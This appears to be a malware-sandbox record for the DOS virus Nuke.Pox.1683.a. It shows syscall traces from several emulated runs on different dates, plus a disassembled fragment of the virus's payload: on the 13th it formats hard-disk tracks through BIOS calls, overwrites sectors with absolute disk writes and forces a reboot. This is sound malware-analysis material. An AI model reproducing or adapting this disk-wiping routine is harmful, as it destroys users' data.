Sample viewer

vx.netlux.org/Virus.DOS.Nuke.Pox.1683.a

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:46.359989694Z 42 PC: 12a57 | Get date
0x12a57: cmp dl, 0xd
0x12a5a: je 0x12a5e
0x12a5c: jmp 0x12a80
0x12a5e: mov ch, 0
0x12a60: mov ah, 5
0x12a62: mov dh, 0
0x12a64: mov dl, 0x80
0x12a66: int 0x13
0x12a68: inc ch
0x12a6a: jb 0x12a71
0x12a6c: cmp ch, 0x10
0x12a6f: loopne 0x12a60
0x12a71: mov al, 2
0x12a73: mov cx, 0x20
0x12a76: mov dx, 0
0x12a79: int 0x26
0x12a7b: ljmp 0xffff:0xfff0
0x12a80: mov ax, 0xabdc
0x12a83: int 0x21
0x12a85: cmp bx, 0xabdc
2018-12-17T22:54:46.36638812Z 171 PC: 12a85 | UNKNOWN!
2018-12-17T22:54:46.369101284Z 53 PC: 12a94 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:54:46.371497903Z 74 PC: 12abb | Reallocate memory
2018-12-17T22:54:46.375694958Z 72 PC: 12ac4 | Allocate memory
2018-12-17T22:54:46.379429393Z 37 PC: 12aef | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:54:46.395343841Z 76 PC: 0 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11674,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:08.792045302Z 42 PC: 12a57 | Get date
0x12a57: cmp dl, 0xd
0x12a5a: je 0x12a5e
0x12a5c: jmp 0x12a80
0x12a5e: mov ch, 0
0x12a60: mov ah, 5
0x12a62: mov dh, 0
0x12a64: mov dl, 0x80
0x12a66: int 0x13
0x12a68: inc ch
0x12a6a: jb 0x12a71
0x12a6c: cmp ch, 0x10
0x12a6f: loopne 0x12a60
0x12a71: mov al, 2
0x12a73: mov cx, 0x20
0x12a76: mov dx, 0
0x12a79: int 0x26
0x12a7b: ljmp 0xffff:0xfff0
0x12a80: mov ax, 0xabdc
0x12a83: int 0x21
0x12a85: cmp bx, 0xabdc

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11674,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:09.494205158Z 42 PC: 12a57 | Get date
0x12a57: cmp dl, 0xd
0x12a5a: je 0x12a5e
0x12a5c: jmp 0x12a80
0x12a5e: mov ch, 0
0x12a60: mov ah, 5
0x12a62: mov dh, 0
0x12a64: mov dl, 0x80
0x12a66: int 0x13
0x12a68: inc ch
0x12a6a: jb 0x12a71
0x12a6c: cmp ch, 0x10
0x12a6f: loopne 0x12a60
0x12a71: mov al, 2
0x12a73: mov cx, 0x20
0x12a76: mov dx, 0
0x12a79: int 0x26
0x12a7b: ljmp 0xffff:0xfff0
0x12a80: mov ax, 0xabdc
0x12a83: int 0x21
0x12a85: cmp bx, 0xabdc
2018-12-25T12:31:09.496581228Z 171 PC: 12a85 | UNKNOWN!
2018-12-25T12:31:09.497533245Z 53 PC: 12a94 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:31:09.498507456Z 74 PC: 12abb | Reallocate memory
2018-12-25T12:31:09.499865268Z 72 PC: 12ac4 | Allocate memory
2018-12-25T12:31:09.501115726Z 37 PC: 12aef | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:31:09.505146482Z 76 PC: 0 | Terminate with return code (Return code = '0')